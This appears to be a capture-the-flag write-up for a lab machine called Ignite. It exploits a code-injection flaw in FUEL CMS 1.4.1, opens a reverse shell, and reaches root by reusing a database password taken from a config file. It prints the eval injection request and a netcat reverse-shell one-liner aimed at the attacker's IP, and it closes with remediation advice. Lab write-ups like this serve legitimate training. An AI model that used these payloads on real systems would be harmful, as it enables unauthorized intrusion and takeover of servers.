Here is the comprehensive writeup for the Ignite machine.

This is a straightforward “Vulnerable Web App” box that demonstrates the danger of hardcoded database credentials being reused for system access.


Ignite - Comprehensive Penetration Test Report

Target IP: fuel.thm (or machine IP) Difficulty: Easy Objective: User (user.txt) & Root (root.txt) Flags

1. Executive Summary

“Ignite” is a Linux machine hosting a vulnerable version of FUEL CMS. We gain initial access by exploiting a known Remote Code Execution (RCE) vulnerability (CVE-2018-16763) in FUEL CMS 1.4.1. Privilege escalation is achieved by enumerating configuration files within the web directory, where hardcoded database credentials are found and successfully reused for the root user.

Key TTPs (MITRE ATT&CK):

  • T1595 (Active Scanning): Web directory enumeration.
  • T1190 (Exploit Public-Facing App): FUEL CMS RCE via filter parameter.
  • T1552 (Unsecured Credentials): Finding passwords in database.php config files.
  • T1078 (Valid Accounts): Reusing database passwords for system root access.

2. Operational Setup

Host Configuration

echo "10.10.x.x fuel.thm" | sudo tee -a /etc/hosts

3. Enumeration

A. Network Scanning

Nmap reveals a single web server.

  • 80/tcp (HTTP): Apache 2.4.18 running FUEL CMS.

B. Web Enumeration

  1. Robots.txt: Disallows /fuel/.
  2. Default Credentials: Accessing http://fuel.thm/fuel/ redirects to a login page.
  • User: admin
  • Password: admin (Default works).
  • Note: While we can log in, the dashboard doesn’t offer an obvious upload feature for shells, so we look for exploits.

C. Vulnerability Scanning

The landing page or headers identify the CMS as FUEL CMS 1.4.1. Searching exploit databases:

searchsploit fuel cms
  • Result: CVE-2018-16763 (Remote Code Execution).

4. Initial Access: FUEL CMS RCE

The Vulnerability

FUEL CMS versions 1.4.1 and older are vulnerable to code injection in the /fuel/pages/select/ endpoint via the filter parameter. The input is passed to eval() without sanitization.

Exploitation (Python Script)

You used a modified Python 3 script to automate the injection.

Key Payload Logic: The script sends a request like:

GET /fuel/pages/select/?filter='%2bpi(print($a='system'))%2b$a('COMMAND')%2b' HTTP/1.1

This forces PHP to evaluate system('COMMAND').

Getting a Reverse Shell

Since the web shell is limited (and often output-constrained), we upgrade to a full reverse shell immediately.

  1. Listener: nc -lvnp 4444.
  2. Payload:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.YOUR.IP 4444 >/tmp/f

(URL Encoded inside the python script).

Status: Shell as www-data.


5. Privilege Escalation: Config Files

Enumeration

We are www-data. We run linpeas.sh or perform manual enumeration.

  • SUID Check: /usr/bin/pppd is SUID root, but often requires specific versions/configs to exploit (Rabbit Hole).

The Discovery

We check the web application configuration files for secrets. This is standard procedure for any CMS (WordPress, Joomla, etc.).

Path: /var/www/html/fuel/application/config/ File: database.php

cat /var/www/html/fuel/application/config/database.php

Content:

$db['default'] = array(
    'dsn'   => '',
    'hostname' => 'localhost',
    'username' => 'root',
    'password' => 'mememe',  <-- CRITICAL
    'database' => 'fuel_schema',
    ...
);

Password Reuse

The database is configured to use the root user with the password mememe. We try to switch to the system root user with this password.

su root
# Password: mememe

Result:

# whoami
root

Root Flag: /root/root.txt.


6. Remediation (Blue Team)

  1. Patch CMS: Update FUEL CMS to the latest version immediately to fix the RCE.
  2. Secure Configuration:
  • Do not use Root for Databases: The web application should connect to the database using a restricted user (fuel_user) with privileges only on fuel_schema.
  • Password Reuse: Never use the system root password for service accounts (like MySQL).
  1. Default Credentials: Change the default admin:admin credentials for the CMS dashboard.